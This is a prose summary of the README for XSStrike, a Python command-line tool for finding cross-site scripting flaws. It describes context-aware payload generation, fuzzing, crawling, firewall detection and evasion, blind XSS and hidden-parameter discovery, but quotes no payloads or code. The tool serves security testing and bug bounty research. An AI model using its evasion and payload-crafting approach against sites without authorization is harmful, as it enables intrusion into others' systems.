s0md3v/xsstrike

XSStrike is a command-line tool, written in Python, for finding cross-site scripting bugs in websites. Cross-site scripting, usually shortened to XSS, is a class of web security flaw where an attacker can trick a vulnerable site into running JavaScript inside another visitor's browser. XSStrike is meant for security testers and bug bounty researchers who want to check whether a target site has this kind of flaw. The project describes itself as a detection suite rather than just a scanner. The README's main pitch is that most XSS tools work by firing a long list of fixed payloads at a site and watching for them to appear in the response. XSStrike instead reads the response with four hand-written parsers, works out the HTML or JavaScript context in which user input lands, and then has a payload generator and a fuzzing engine build attack strings tailored to that context. The README shows several example payloads it generates, which look like deliberately obfuscated HTML and JavaScript snippets. The feature list in the README covers scanning for both reflected XSS and DOM XSS, a multi-threaded crawler that walks a target site, the parsing and context analysis described above, detection and evasion of Web Application Firewalls, scanning for outdated JavaScript libraries on the site, a payload-encoding step, a brute-force mode that reads payloads from a file, blind XSS support, and discovery of hidden URL parameters. Some of these capabilities come from sibling projects by the same author that XSStrike pulls in: Photon for crawling, Zetanize for form parsing, and Arjun for parameter discovery. Installation is described in three terminal commands: clone the repository, change directory into it, and install the Python dependencies with pip. After that the tool is run as python xsstrike.py. The README points readers at the project wiki for proper usage instructions, a compatibility and dependencies page, and an FAQ that covers questions such as the false positive rate, why the author calls this the most advanced XSS detection suite, and how to reuse the code in other software. A gallery embeds screenshots showing the tool finding DOM and reflected XSS, crawling, fuzzing, and brute forcing from a payload file. The project is released under the GNU GPL version 3. The README credits two outside sources: the WAF signatures are taken from the sqlmap project, and one plugin is a modified version of retirejslib.